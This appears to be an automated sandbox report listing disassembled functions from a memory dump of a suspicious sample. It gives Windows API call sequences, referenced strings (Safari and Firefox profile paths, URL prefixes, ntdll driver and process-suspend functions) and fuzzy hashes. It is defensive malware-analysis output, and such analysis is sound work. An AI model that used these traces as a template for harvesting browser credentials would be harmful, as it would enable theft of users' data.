                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                  • String ID:
                  • API String ID: 1828521557-0
                  • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                  • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                  • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                  • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                  APIs
                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                  • memcpy.MSVCRT ref: 00406942
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@FilePointermemcpy
                  • String ID:
                  • API String ID: 609303285-0
                  • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                  • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                  • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                  • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmp
                  • String ID:
                  • API String ID: 2081463915-0
                  • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                  • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                  • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                  • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                  APIs
                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$CloseCreateErrorHandleLastRead
                  • String ID:
                  • API String ID: 2136311172-0
                  • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                  • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                  • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                  • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                  APIs
                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@
                  • String ID:
                  • API String ID: 1936579350-0
                  • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                  • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                  • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                  • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                  APIs
                  • EmptyClipboard.USER32 ref: 004098EC
                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                  • GlobalFix.KERNEL32(00000000), ref: 00409927
                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                  • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                  • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                  • GetLastError.KERNEL32 ref: 0040995D
                  • CloseHandle.KERNEL32(?), ref: 00409969
                  • GetLastError.KERNEL32 ref: 00409974
                  • CloseClipboard.USER32 ref: 0040997D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                  • String ID:
                  • API String ID: 2565263379-0
                  APIs
                  • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                  • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadMessageProc
                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                  • API String ID: 2780580303-317687271
                  APIs
                  • EmptyClipboard.USER32 ref: 00409882
                  • wcslen.MSVCRT ref: 0040988F
                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                  • GlobalFix.KERNEL32(00000000), ref: 004098AC
                  • memcpy.MSVCRT ref: 004098B5
                  • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                  • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                  • CloseClipboard.USER32 ref: 004098D7
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                  • String ID:
                  • API String ID: 2014503067-0
                  APIs
                  • GetLastError.KERNEL32 ref: 004182D7
                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                  • LocalFree.KERNEL32(?), ref: 00418342
                  • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                  • String ID: OsError 0x%x (%u)
                  • API String ID: 403622227-2664311388
                  APIs
                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                  • OpenClipboard.USER32(?), ref: 00411878
                  • GetLastError.KERNEL32 ref: 0041188D
                  • DeleteFileW.KERNEL32(?), ref: 004118AC
                    • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                    • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                    • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                    • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                    • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                    • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                    • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                    • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                    • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                  • String ID:
                  • API String ID: 1203541146-0
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@memcpymemset
                  • String ID:
                  • API String ID: 1865533344-0
                  APIs
                  • GetVersionExW.KERNEL32(?), ref: 004173BE
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Version
                  • String ID:
                  • API String ID: 1889659487-0
                  APIs
                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: NtdllProc_Window
                  • String ID:
                  • API String ID: 4255912815-0
                  APIs
                  • _wcsicmp.MSVCRT ref: 004022A6
                  • _wcsicmp.MSVCRT ref: 004022D7
                  • _wcsicmp.MSVCRT ref: 00402305
                  • _wcsicmp.MSVCRT ref: 00402333
                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                    • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                  • memset.MSVCRT ref: 0040265F
                  • memcpy.MSVCRT ref: 0040269B
                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                  • memcpy.MSVCRT ref: 004026FF
                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                  • API String ID: 577499730-1134094380
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                  • String ID: :stringdata$ftp://$http://$https://
                  • API String ID: 2787044678-1921111777
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                  • GetWindowRect.USER32(?,?), ref: 00414088
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                  • GetDC.USER32 ref: 004140E3
                  • wcslen.MSVCRT ref: 00414123
                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                  • ReleaseDC.USER32(?,?), ref: 00414181
                  • _snwprintf.MSVCRT ref: 00414244
                  • SetWindowTextW.USER32(?,?), ref: 00414258
                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                  • GetClientRect.USER32(?,?), ref: 004142E1
                  • GetWindowRect.USER32(?,?), ref: 004142EB
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                  • GetClientRect.USER32(?,?), ref: 0041433B
                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                  • String ID: %s:$EDIT$STATIC
                  • API String ID: 2080319088-3046471546
                  APIs
                  • EndDialog.USER32(?,?), ref: 00413221
                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                  • memset.MSVCRT ref: 00413292
                  • memset.MSVCRT ref: 004132B4
                  • memset.MSVCRT ref: 004132CD
                  • memset.MSVCRT ref: 004132E1
                  • memset.MSVCRT ref: 004132FB
                  • memset.MSVCRT ref: 00413310
                  • GetCurrentProcess.KERNEL32 ref: 00413318
                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                  • memset.MSVCRT ref: 004133C0
                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                  • memcpy.MSVCRT ref: 004133FC
                  • wcscpy.MSVCRT ref: 0041341F
                  • _snwprintf.MSVCRT ref: 0041348E
                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                  • SetFocus.USER32(00000000), ref: 004134B7
                  Strings
                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                  • {Unknown}, xrefs: 004132A6
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                  • API String ID: 4111938811-1819279800
                  APIs
                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                  • SetCursor.USER32(00000000,?,?), ref: 0040129E
                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                  • EndDialog.USER32(?,?), ref: 0040135E
                  • DeleteObject.GDI32(?), ref: 0040136A
                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                  • ShowWindow.USER32(00000000), ref: 00401398
                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                  • ShowWindow.USER32(00000000), ref: 004013A7
                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                  • String ID:
                  • API String ID: 829165378-0
                  APIs
                  • memset.MSVCRT ref: 00404172
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                  • wcscpy.MSVCRT ref: 004041D6
                  • wcscpy.MSVCRT ref: 004041E7
                  • memset.MSVCRT ref: 00404200
                  • memset.MSVCRT ref: 00404215
                  • _snwprintf.MSVCRT ref: 0040422F
                  • wcscpy.MSVCRT ref: 00404242
                  • memset.MSVCRT ref: 0040426E
                  • memset.MSVCRT ref: 004042CD
                  • memset.MSVCRT ref: 004042E2
                  • _snwprintf.MSVCRT ref: 004042FE
                  • wcscpy.MSVCRT ref: 00404311
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                  • API String ID: 2454223109-1580313836
                  APIs
                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                  • SetMenu.USER32(?,00000000), ref: 00411453
                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                  • memcpy.MSVCRT ref: 004115C8
                  • ShowWindow.USER32(?,?), ref: 004115FE
                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                  • API String ID: 4054529287-3175352466
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscat$_snwprintfmemset$wcscpy
                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                  • API String ID: 3143752011-1996832678
                  APIs
                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                  • API String ID: 667068680-2887671607
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintfmemset$wcscpy$wcscat
                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                  • API String ID: 1607361635-601624466
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintf$memset$wcscpy
                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                  • API String ID: 2000436516-3842416460
                  APIs
                    • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                    • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                    • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                    • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                    • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                  • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                  • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                  • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                  • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                  • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                  • LoadIconW.USER32(00000000,00000076), ref: 00403634
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                  • LoadIconW.USER32(00000000,00000077), ref: 00403648
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                  • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                  • LoadIconW.USER32(00000000,00000078), ref: 00403670
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                  • String ID:
                  • API String ID: 1043902810-0
                  • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                  • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                  • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
